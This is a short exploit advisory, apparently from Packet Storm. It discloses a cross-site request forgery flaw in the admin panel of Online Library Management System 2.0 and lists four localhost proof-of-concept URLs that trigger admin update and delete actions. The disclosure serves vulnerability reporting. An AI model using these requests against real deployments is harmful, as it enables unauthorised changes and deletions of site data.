Online Library Management System version 2.0 suffers from a cross site request forgery vulnerability.
f335a643743c790f4fb904a776705386fc4d1db5eb5374c4b6fe56d99496825a# Exploit Title: Online Library Management System
# Date:15/06/2021
# Exploit Author : Mohit Dabas
# Vendor Homepage : https://phpgurukul.com
# Software Link : https://phpgurukul.com/online-library-management-system/
# Version: 2.0
# Tested on : LAMPP
# Description #
Online Library Management System has got CSRF in admin panel .Wherever the admin can update or delete option the CSRF exists.
Following are the Example URLs
# Proof of Concept (PoC) : Exploit #
http://127.0.0.1:8080/library/admin/reg-students.php?id=12
http://127.0.0.1:8080/library/admin/edit-category.php?catid=4
http://127.0.0.1:8080/library/admin/manage-categories.php?del=4
http://127.0.0.1:8080/library/admin/update-issue-bookdeails.php?rid=6
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed